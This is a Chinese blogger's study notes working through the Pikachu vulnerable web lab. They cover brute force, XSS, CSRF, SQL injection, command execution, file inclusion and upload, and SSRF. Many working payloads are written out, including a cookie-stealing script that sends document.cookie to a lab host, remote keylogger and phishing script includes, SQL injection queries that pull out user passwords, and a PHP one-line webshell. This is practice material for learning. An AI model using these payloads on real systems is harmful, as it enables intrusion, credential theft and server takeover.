公司的电脑是在太烂了,只能跑wps,所以打算摸鱼的时候看看自己的笔记,回忆式学习,有时候我自己也解决不了的,希望大佬们指点下。

暴力破解

基于表单暴力破解

普通的burpsuite暴力破解,双选择cluster

验证码绕过(on server)

解决办法同暴力破解,在repeater中使用相同的验证码,多次提交可以成功

验证码绕过(on client)

解决办法同暴力破解,在repeater中不输入验证码,多次提交,都可以成功

Token防爆破

类似于暴力破解,见密码穷举, burpsuite 暴利破解带token防御网站密码

CSS(跨站脚本)

跨站脚本漏洞测试流程:

①在目标站点上找到输入点,比如查询接口,留言板等;

②输入一组”特殊字符+唯一识别字符”(;"’<>9999), 点击提交后,查看返回的源码,是否有做对应的处理;

③通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件 (构造闭合) ;

④提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;

提示:

1.一般查询接口容易出现反射型XSS ,留言板容易出现存储型XSS ;

2.由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效或者环境限制了执行(浏览器) ;

3.通过变化不同的script ,尝试绕过后台过滤机制;

反射型(get,post)

输入;"’<>9999进行测试

输入<script>alert('xss')</script>就会出现弹窗提醒

GET和POST典型区别:

GET是以url方式提交数据;

POST是以表单方式在请求体里面提交;

存储型XSS

攻击手段与反射型类似,不同的是数据会被存储到数据库中

DOM型XSS

进攻手段就是拼接HTML语句,a标签闭合

拼接原有的html语法(<a href='"+str+"'>what do you see?</a>)

在输入框中输入如下内容拼接 ' οnclick="alert('xss')">

最终形成的语句是  <a href='' οnclick="alert('xss')">'>what do you see?</a>

DOM型XSS-x

与XSS不同在与,输入实际上是从url上获取的

攻击手段同上面XSS,也是拼接成HTML语句,a标签闭合,点击后出现弹窗

XSS盲打

即在前端是盲打,看不出任何bug。在client端,无论输入什么都体验不出来xss攻击,但是在server端的后台,由于从数据库捞出了数据,会体会到xss攻击。

例子:随便输入个弹窗口令 <script>alert('xni')</script>   会被存入到数据库中,

在前端client侧没有任何感知,但是后台系统,会出现弹窗

前台展示正常

后台

XSS的过滤( filter)

XSS绕过-过滤-转换

0,前端限制绕过,直接抓包重放,或者修改html前端代码

1,大小写,比如: <SCRIPT> aLeRT(111)</sCRIpt>

2,拼凑: <scri<script> pt> alert(111)</scri</script> pt>

3,使用注释进行干扰: <scri<!--test--> pt> alert(111)</sc <--test--> ript>

核心思路:

后台过滤了特殊字符,比如< script>标签,但该标签可以被各种编码,后台不一定会过滤

当浏览器对该编码进行识别时,会翻译成正常的标签,从而执行.

在使用编码时需要注意编码在输出点是否会被正常识别和翻译!

例如:

<img src=x οnerrοr=" alert('xss')" />

不可执行:<img src=x οnerrοr= " alert%28%27xss%27%29" />

而将alert(‘xss’)进行编码后可以不被过滤,即:

<imgsrC=Xοnerrοr="alert('xss')”/>

<imgsrc=xοnmοuseοver="a&l#108;ert('x&l#115;s')"/>

本测试通关为<scRIPt>alert(666)</ScrIpt>,只对script进行了过滤

XSS之htmlspecialchars()

htmlspecialchars()函数把预定义的字符转换为HTML实体,会自动转换

随意输入11111'"<>&,观察后台处理情况我们发现除了单引号其他的特殊字符都进行了编码,所以输入 ' οnclick=’alert(xss)’ 即可

XSS之href输出

输入javascript:alert(111),查看源码

(与DOM-xss区别,这个是在纯a里面,另外一个是在JS的标签a中)

点击后就会出现弹窗

XSS之JS输出

输入111找输入点

输入tmac是图片,所以要构造语句来进行xss

'</script><script>alert('xss')</script> ,先将前面的script闭合再插入我们自己的语句

危害

获取cookie

在反射xss(get)中输入如下payload

<script>document.location='http://www.happyhack.com/pikachu/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script>

解析:字符串就是网页的www路径,根据自己配置的网站文件夹位置修改即可

在后台管理界面即可看到cookie

钓鱼

存储型XSS,输入

<script src="http://www.happyhack.com/pikachu/pkxss/xfish/fish.php"></script>

路径同上

会出现弹窗

之后,只要访问这个页面,都会弹出上图的框,只要用户输入账号和密码,就会被后台的文件获取到(无论是宝塔还是phpstudy都获取不到,有大佬可以解答下吗?)

获取键盘记录

在存储型xss的页面输如一个能够调用远程js的一个方法。将

<script src="http://www.happyhack.com/pikachu/pkxss/rkeypress/rk.js"></script>

输入到留言板上。点击提交,此时,我们已经将这段代码嵌入到了页面中

在/pkxss/rkeypress 的rkserver.php中设置允许跨域访问

修改rk.js的网址

这时候在界面输入,就可以在后台查看到键盘的输入

CSRF(跨站请求伪造)

在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)

然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击也就完成了。

所以CSRF攻击也被称为为" one click "攻击

CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。CSRF操作者是用户自己修改数据,XSS是攻击者操作数据。

如何确认一个web系统存在csrf漏洞

1,对目标网站增删改的地方进行标记,并观察其逻辑,判断请求是否可以被伪造

–比如修改管理员账号时 ,并不需要验证旧密码 ,导致请求容易被伪造 ;

–比如对于敏感信息的修改并没有使用安全的token验证,导致请求容易被伪造;

2.确认凭证的有效期(这个问题会提高CSRF被利用的概率)

—虽然退出或者关闭了浏览器,但cookie仍然有效,或者session并没有及时过期,导致CSRF攻击变的简单

CSRF ( get )实验演示和解析

先登录,修改个人信息

利用burpsuite抓包,并没有token认证,所以直接修改url里面的参数,诱导用户点击即可

 在repeater中发送即可发现后台信息发生了变化

CSRF ( post )实验演示和解析

唯一不同时,信息不放在url中,使用请求体来修改参数

可以自建一个网址,诱导用户点击,网页代码如下

用户如果访问了改网址,信息就会立刻更改

<html><script>                                                                                                       <!-- 这个script是用来自动提交表单的 -->window.onload = function() {document.getElementById("submit").click();}</script>              <body><form action="http://www.happyhack.com/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">    <input type="hidden" name="sex" value="girl" /><input type="hidden" name="phonenum" value="123456789" /><input type="hidden" name="add" value="usa" /><input type="hidden" name="email" value="caker@pikachu.com" /><input type="hidden" name="submit" value="submit" /><input id="submit" type="submit" value="Submit request" style="display:none"/>                    <!-- style设置为display:none起到隐藏submit按钮的作用 --></form></body>
</html>

解决办法:

增加token验证(常用的做法) :

1,对关键操作增加token参数,token值必须随机,每次都不一样;

关于安全的会话管理(避免会话被利用) :

1,不要在客户端端保存敏感信息(比如身份认证信息) ;

2,测试直接关闭,退出时,的会话过期机制;

3,设置会话过期机制,比如15分钟内无操作,则自动登录超时;

访问控制安全管理:

1,敏感信息的修改时需要对身份进行二次认证,比如修改账号时,需要判断旧密码;

2,敏感信息的修改使用post,而不是get ;

3,通过http头部中的referer来限制原页面

增加验证码:

一般用在登录(防暴力破解) ,也可以用在其他重要信息操作的表单中(需要考虑可用性)

SQL注入

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损,总结就是拼命构造正确sql语句,并能找到自己想要的数据库信息。

(UNION sql语句很好用)

SQL Inject 漏洞攻击流程

第一步:注入点探测

自动方式:使用web漏洞扫描工具,自动进行注入点发现

手动方式:手工构造sq| inject测试语句进行注入点发现

第二步:信息获取

通过注入点取期望得到的数据。

1.环境信息:数据库类型,数据库版本,操作系统版本,用户信息等。

2.数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解)

第三步:获取权限

获取操作系统权限:通过数据库执行shell,上传木马

数字型注入(post)

Burp抓包, 看见id=2的参数

猜测原 sql     select x,y from 表名 where id = 2

构造新的sql语句

where id = 2 or 1=1   在repeater中如下修改,点击response的Render,获得界面

字符型注入(get)

根据字符的输入,猜测原sql:  select x,y from 表名 where username = '333';

拼凑sql   select x,y from 表名 where username = ' 333’ or 1=1 # '

搜索型注册

猜测sql  select *from 表名 where username like ' %666% ';

拼接sql   select * from 表名 where username like ' %666% ‘or 1=1 #% ' ;

如果用$会怎样?

XX注入

猜测sql  select * from 表名 where username = 'allen '; (字符输入型)

Xx为数组,字符串等都可

但是仔细查php源码,全匹配是带括号的

所以拼接sql  select * from 表名 where username = '(allen)’or 1=1# '

基于union联合查询的信息获取( select )完整的sql注入流程

1. 打开字符型注入,我们先输入一个单引号进行测试。提交发现出现报错。

在单引号处出现了语法错误,那么我们就会知道我们输入的单引号已经被拼接到SQL里面了。也就意味着这里存在着SQL注入漏洞。它会把前端输入当作数据库里的一部分逻辑去处理。

2. 利用order by 来查询字段数量

输入aa’ order by 5#

减小数字,直到不报错

3. 利用union来拼接查询,通过字段的数量来显示想要的信息

a' union select database(),uesr()#    这里是数据库名+当前的用户(数据库)

也可以换成其他:

Select version(); //取的数据库版本

Select database(); //取得当前的数据库

Select user(); //取得当前登录的用户

4. 确定字段之后我们就可以做联合查询。想要获取information_ schema中的数据,至少要知道数据库名称。

kobe' union select database(),user()#

5. 拿到名称后我们就可以通过information_ schema去获取数据。通过union联合查询,然后通过information_ schema去获取pikachu一共有多少个表,表的名称是什么

kobe' union select table_schema,table_name from information_schema.tables where table_schema='pikachu'#

6. 除了正常的查询,pikachu数据库中所有表的名称也被我们爆出来了。我们发现有一个表名叫做users,我们可以猜测是不是所有的用户名密码都在其中

kobe' union select table_name,column_name from information_schema.columns where table_name='users'#

7. 发现有username 和password列,所以可以继续查询

kobe' union select username,password from users#

8. 解密数据中的密码,sql完整步骤成功

基于报错的信息获取(select/delete/update/insert)完整注入

基于报错的信息获取------三个常用的用来报错的函数

updatexml() :函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

extractvalue():函数也是MYSQL对XML文档数据进行查询的XPATH函数。

floor(): MYSQL中用来取整的函数

Updatexm()函数作用: 改变(查找并替换) XML文档中符合条件的节点的值。

语法: UPDATEXML (xml document, XPathstring, new_value)

第一个参数: fiedname是String格式,为表中的字段名。

第二个参数: XPathstring (Xpath格式的字符串)。

第三个参数: new. value,String格式,替换查找到的符合条件的

Xpath定位必须是有效的,否则会发生错误

kobe' and updatexml(1,concat(0x7e,version()),0)#

extractvalue(目标xml文档,xml路径)

第一个参数 : 第一个参数可以传入目标xml文档

第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

kobe' and extractvalue(0,concat(0x7e,version()))#

Floor函数使用

kobe' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

利用extractvalue做介绍

kobe' and extractvalue(1,version())#

报错没有想要的版本号

继续kobe' and extractvalue(1,concat(0x7e,version()))#

找到了想要的版本号

后续,就类似于union联合查询,只不过是用错误展示出来

kobe' and extractvalue(1,concat(0x7e,database()))#   找到数据库

kobe' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')))#  超过一行,可以利用limit逐个显示

kobe' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)))# 获得第一表名,获取第二个,只需改成limit 1,1

 

同理获取表格中的列

kobe' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)))#

获取用户名和账号

kobe' and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#

kobe' and extractvalue(1,concat(0x7e,(select password from users where username='admin' limit 0,1)))#   解密密码即可

insert/update注入

一样的方法判断是否有SQL注入漏洞,经过判断之后发现存在SQL漏洞。重点在于怎么构造insert的payload。

用户:   aaron' or updatexml(1,concat(0x7e,database()),0) or '

其他随便

后续同之前的步骤,爆破

update与insert是一模一样的。我们先登录用户,剩下步骤一样

Delete注入

先用burpsuite抓包,发送到repeater

修改value值 71 or updatexml(1,concat(0x7e,database()),0) 在response中查看结果,pretty或者Render均可

http header的注入

登录后,刷新页面,抓包

按照之前的道理,修改User-Agent的值:firefox' or updatexml(1,concat(0x7e,database()),0) or '

(为什么是User-Agent)试了下其他的不管用

返回了数据库名

盲注( boolian base )

在有些情况下,后台使用了错误消息屏蔽方法(比如@ )屏蔽了报错,此时无法在根据报错信息来进行注入的判断。这种情况下的注入,称为“盲注"

boolean的盲注主要表现症状:

没有报错信息

不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1)

在正确的输入下,输入and 1= 1/and 1= 2发现可以判断

先输入一个正确的sql:allen' and 1=1#   再输入错误的sql:allen' and 1=2#,固定错误展示

利用如下sql:allen' and ascii(substr(database(),1,1))>112#  可以判断数据的第一个字幕的ascii码是否大于112,同样的报错

但是改成111后,显示了allen的信息,证明ascii的值就是112,即p

也可以用下面的语句:

allen' and substr(database(),1,1)='p'#

盲注( time base )

如果说基于boolean的窗注在页面上还可以看到0 or 1的回显的话那么基于time的盲注完全就啥都看不到了!

但还有一个条件,就是“时间”, 通过特定的输入,判断后台执行的时间,从而确认注入!

例如输入allen' and sleep(3)#   明显感觉到查询变慢,看开发者工具的网络,看到等待了3s

后续思路同boolian:allen' and if((substr(database(),1,1))='p',sleep(3),null)#

宽字节

宽字节注入是sql注入的一种手段,利用mysql使用GBK编码(因为GBK占用2个字节,而ascii占用1个字节),将两个字符看作一个汉字,从而消除转义字符\。(当某字符的大小为一个字节时,称其字符为窄字节当某字符的大小为两个字节时,称其字符为宽字节。所有英文默认占一个字节,汉字占两个字节。)

宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\'

由于and被php转义后就是%df,所以使用下面的语句(后面就全与字符注入一样了)

输入: 1%df union select database(),user()#

(有时候成功,有时候不成功)

But

拼接语句: allen%df' union select 1,table_name  from information_schema.tables where table_name='users'#

由于在后面用了',addslashes()对'进行了转义,所以造成错误

SQL Inject漏洞之表(列)名的暴力破解

利用burpsuite対数据库的表(列)就行暴力枚举

利用字符型sql注入

kobe' and exists(select * from pikachu)#  爆破数据表

kobe' and exists(select id from users)#   爆破表中的列

红色为变量

RCE(代码/命令执行)

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

Exec “ping”

尝试 ping 一下本地127.0.0.1

这里可以拼接任何系统命令,我的是Centos的,输入127.0.0.1 && ps aux,会显示全部进程

Exec “evel”

输入phpinfo();

即可被执行,查看php函数

这里就可以输入任何命令

如果是win系统:根据代码执行这个漏洞,我们可以通过此处上传一句话木马。

输入payload: fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');

我用Linux 创建文件echo '<?php assert($_POST[fin]);?>' >shell.php;  怀疑是权限问题,网页里用的www用户

File Inclusion(文件包含)

Local

本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击着更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。

尝试获取一个图片并抓包

遍历查找file1-10000

发现这个6很特别

访问得到了账号和密码

同样可以访问不同文件夹的文件

../../../README.md,注意这里是相对路径了(两个点)

../../../../DVWA/README.md   与pikachu同级的DVWA靶场的README文件

Remote

远程文件包含漏洞:能够通过url地址对远程的文件进行包含,这意味着攻击者可以传入任意的代码,这种情况没啥好说的,准备挂彩。

因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。

随便选个图,发现url中把include()函数的完整参数给出来了

所以这关其实除了远程文件包含,还可以本地文件包含使用绝对路径

Linux下的路径要写www/wwwroot/xxxxx/xx/xxx.txt

不安全文件下载

随便下个文件抓包,发现filename这个参数,可以尝试改参数,例如ai.png

我们还可以使用目录遍历的方式去修改链接下载敏感文件

不安全文件上传

用途:通过上传木马文件,然后通过文件包含去访问上传的文件,进行攻击

Client check

限制上传指定格式的文件

尝试上传php,出现弹窗,无法上传

查看网页源码:

发现有个onchange,这里有个checkFileExt函数,尝试删除后,上传成功

MIME type

Multipurpose Internet Mail Extensions多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。

每个MIME类型由两部分组成,前面是数据的大类别,例如声音audio、图象image等,后面定义具体的种类。常见的MIME类型,比如:

超文本标记语言文本.html.html texthtml

普通文本.txt text/plain

RTF文本.rtf application/rtf

GIF图形.gif image/gif

JPEG图形.ipeg.jpg image/jpeg

上传图片抓包

上传php文件抓包

发现请求头不一样,修改请求头试一下

提示上传成功

Get image size

Getimagesize ( )返回结果中有文件大小和文件类型,如果用这个函数来获取类型,从而判断是否是图片的话,会存在问题。

是否可以绕过呢?可以,因为图片头可以被伪造。

图片木马的制作:

方法1 :直接伪造头部GIF89A

方法2.CMD: copy /b aa.jpeg + 1.php 111.jpeg

方法3.使用GIMP (开源的图片修改软件) , 通过增加备注,写入执行命令

测试功能,没有问题,开始制作木马图片。这里使用第二种方法。

进入桌面,先输入命令dir,保证可以找到你需要的文件。

打开展示完全没有问题,但是在16进制中图片内容加入了一句话木马内容

成功上传木马图片。我们访问这个图片但是一句话并没有执行,这时候就需要结合本地文件包含漏洞搞事情。打开文件包含漏洞 file include,上传图片,修改路径。就可以执行一句话木马

越权

水平越权

首先登录lucy,可以查到lucy的信息

http://xxx/pikachu/vul/overpermission/op1/op1_mem.php?username=lili&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF#

修改url中的名字,lucy变lili,lucy的账号居然可以看到lili的个人信息

垂直越权

先登录超级管理员,去执行只有管理员才可以操作的新增账号的功能,用burp抓包。退出登录。登录普通用户,执行新增账号操作。如果成功,则存在垂直越权漏洞

Admin用户添加aaron,修改cookie为普通的pikachu用户试试

点击send,刷新页面,发现创建成功

目录遍历

正常点击的url如下图,尝试修改title的参数

我们可以修改文件名。修改成…/dir.php上级目录下的dir.php

敏感信息泄露

在设计时网站的源码会泄露一些信息,很少有

当然也可以直接访问url

PHP反序列化

随便输入,都是一句话:

单我们输入如下的payload,会出现弹窗

O:1:"s":1:{s:4:"test";s:30:"<script>alert('fxlh')</script>";}

查看源码,没有对用户传进来的参数做过滤,直接反序列化。

XXE(XML外部实体攻击)

既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

查看源码:

simple_load_string()函数

函数转换形式良好的XML字符串为SimpleXMLElement对象

在PHP里面解析xml用的是libxml,其在>=2.9.0的版本中,默认是禁止解析xml外部实体内容的

xxe漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致攻击者可以构造一个恶意的XML


<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE note [<!ENTITY hack "hello world">
]><name>&hack;</name>

URL重定向

可以修改超链接中的url

修改为google

熟练后可以的定向转到提前搭建好的恶意站点,进行钓鱼

SSRF(服务器端请求伪造)

Curl

由于我是在linux虚机中装的靶场,所以127.0.0.1访问不到,但是我们可以随意修改后面的url地址,

出现了百度的页面

File-getcontent

 修改file变量:  php://filter/read=convert.base64-encode/resource=ssrf.php

Pikachu靶场笔记相关推荐

  1. [NOTE] Pikachu靶场练习笔记

    [NOTE] Pikachu靶场练习笔记 文章目录 [NOTE] Pikachu靶场练习笔记 前言 暴力破解 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) t ...

  2. 网络安全初学者工具安装:Kali,Windows xp虚拟机,pikachu靶场,burpsuite安装配置,phpstudy安装(学习笔记)

             摘要 在互联网发展的时代背景下,网络安全成为了越来越不可忽视的重要领域,为此,各国都采取了维护网络安全的举措,对于网络安全人才的需求不断增大,我国作为世界上最多使用计算机人口的国家, ...

  3. Pikachu靶场通关笔记--Sql Inject(SQL注入)

    在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞.一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原 ...

  4. Pikachu靶场通关笔记

    目录 Burte Force(暴力破解) 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防暴破 Cross-Site Scripting (XSS) ...

  5. Pikachu靶场:XSS盲打

    Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器.Burp Suite.Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果 ...

  6. Pikachu靶场之(XSS盲打)

    Pikachu靶场XSS盲打 1.靶场及源代码检查 发现就是一个简单的Form提交表单到后台,没什么利用的地方. 查看一下提示: 填一个表单然后进后台看看: 管理员进入后台查看: 2.利用在前台也就是 ...

  7. Pikachu靶场全关攻略(超详细!)

    一.靶场搭建 准备工具 phpstudy **pikachu靶场下载地址:**https://github.com/zhuifengshaonianhanlu/pikachu 搭建过程 将靶场文件夹放 ...

  8. Pikachu靶场全关详细教学(一)

    一.Pikachu靶场介绍 Pikachu靶场下载地址:https://github.com/zhuifengshaonianhanlu/pikachu ​ Pikachu是一个带有漏洞的Web应用系 ...

  9. Pikachu靶场之文件包含漏洞详解

    Pikachu靶场之文件包含漏洞详解 前言 文件包含漏洞简述 1.漏洞描述 2.漏洞原因 3.漏洞危害 4.如何防御 第一关 File Inclusion(local) 1.尝试读取"隐藏& ...

最新文章

  1. docker dockerfile 映射端口范围 批量映射端口
  2. 基础练习 杨辉三角形
  3. LA2678最短子序列
  4. CSS权重的等级划分
  5. CTFshow 命令执行 web38
  6. 网易云易盾与A10 Networks达成战略合作 携手打造抗DDoS攻击的解决方案
  7. Linux双网卡NAT共享上网
  8. java 接口的作用和好处
  9. wxWidgets:向后兼容
  10. NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑
  11. 解析5G背后的核心技术:波束成形
  12. mysql基础数据类型字节数_MySQL基础之数据类型
  13. linux下安装rar解压包
  14. EDUCoder编程练习题解(字符数组)
  15. Egret入门学习日记 --- 第十一篇(书中 4.1~4.6节 内容)
  16. matlab拟合函数的三种方法
  17. matlab内置函数subs使用方法
  18. AutoCAD文档01——安装教程
  19. java生成pdf文件并打印
  20. MYSQL、JDBC

热门文章

  1. 手机相册里的照片误删怎么恢复
  2. 暑期学习日记35:图片缩放动画
  3. 用html编写一个无序列表,输出HTML无序列表python
  4. 手把手教你Nginx常用模块详解之ngx_http_status_module(十一)
  5. linux把日历放入文件夹,[linux命令] cal 日历,cat连接并显示文件
  6. SpringMVC3----@Controller注解、RestFul风格的讲解和应用、SpringMVC的接受请求参数、网页跳转方式和数据回显、乱码问题
  7. 2021.7.16模拟赛C组总结(转载XJY)
  8. 二进制的加法减法运算
  9. [JavaScript盛宴]沪JS 2012 即将于9.14召开
  10. 使用Java编写一个简单的 JFrame登陆注册界面(一)